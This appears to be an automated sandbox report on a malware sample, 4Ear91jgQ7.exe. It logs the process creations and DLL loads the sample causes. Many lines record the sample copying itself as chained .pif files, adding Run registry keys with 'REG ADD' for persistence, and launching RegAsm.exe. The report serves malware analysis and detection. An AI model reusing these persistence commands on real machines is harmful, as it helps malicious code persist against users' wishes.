            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif "C:\Users\user\Documents\4Ear91jgQ7.pif"
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6476 -s 2408
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: unknownProcess created: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Desktop\4Ear91jgQ7.exe" "C:\Users\user\Documents\4Ear91jgQ7.pif"Jump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"Jump to behavior
            Source: C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exeProcess created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe"Jump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\findstr.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pifProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c Copy "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif" "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pifProcess created: unknown unknown
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "4Ear91jgQ7.pif.pif.pif.pif.pif" /t REG_SZ /F /D "C:\Users\user\Documents\4Ear91jgQ7.pif.pif.pif.pif.pif.pif"
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4Ear91jgQ7.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Documents\4Ear91jgQ7.pifSection loaded: cryptbase.dllJump to behavior
